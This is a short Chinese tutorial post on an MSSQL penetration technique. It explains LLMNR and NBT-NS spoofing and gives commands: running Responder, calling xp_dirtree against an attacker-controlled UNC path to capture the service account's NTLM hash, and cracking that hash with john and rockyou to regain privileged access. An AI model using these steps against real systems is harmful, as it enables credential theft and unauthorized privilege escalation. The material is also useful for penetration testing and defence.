浅析mssql渗透之XP_dirtree LLMNR/NBT-NS欺骗攻击
LIMNR是什么?
鏈路本地多播名稱解析(LIMNR)是一個基于協議的域名系統(DNS)數據包的格式,使得雙方的IPv4和IPv6的主機來執行名稱解析為同一本地鏈路上的主機,當局域網中的DNS服務器不可用時,DNS客戶端會使用LIMNR本地鏈路多播名稱解析來解析本地的主機名稱
NetBIOS是什么?
Netbios(Network Basic Input Output System):網絡基本輸入輸出系統,提供OSI模型中的會話層服務,分享數據,是一種應用程序接口API同時系統可以利用WINS服務將NetBIOS名解析為相應IP地址,局域網都是在NetBIOS協議的基礎上工作的
當dns解析發送錯誤時,LLMNR(鏈路本地多播名稱解析)和NBT-NS會代替解析
????????監聽LLMNR和NetBIOS協議的可以使用Metasploit或者Responder工具
Responder工具使用
? ? ? ? 下載地址:Responder下載
? ? ? ? Responder是監聽LLMNR和NetBIOS協議的工具之一,能夠抓取網絡中的所有LLMNR和NetBIOS請求并進行響應,獲取最初的賬戶憑證,可以利用內置SMB,MSSQL,HTTP,DNS,POP3,FTP等服務器,收集目標文件的憑證
responder -h responder -I <網卡> -i <ip地址>記錄一次mssql滲透
? ? ? ? 通過SMB得到mssql用戶并且進行mssql數據庫登錄,執行xp_cmdshell發現無權限開啟
? ? ? ? ?發現可以執行擴展存儲xq_dirtree
????????配合xp_dirtree存儲過程獲取運行mssql服務的用戶NTLM的hash值,原理是通過LLMNR/NBT-NS欺騙攻擊,讓MSSQL去訪問我們偽造的服務,當MSSQL去執行時就會把它自己的憑證發給我們,我們通過破解它的憑證在返回登錄MSSQL,得到最高權限具體操作
使用命令responder-I eth0?-i ip地址
回到mssqlclient.py的命令窗口中,執行命令xp_dirtree "\\172.16.1.100\test" 然后回到Responder觀察監聽信息?
?導入一個文件里面 使用jhon破解
jhon --wordlist=/usr/share/wordlists/rockyou.txt <文件名>
最后破解到密碼重新登錄mssql得到最高權限
總結
以上是生活随笔為你收集整理的浅析mssql渗透之XP_dirtree LLMNR/NBT-NS欺骗攻击的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: IIC总线电阻/电容的计算
- 下一篇: 截图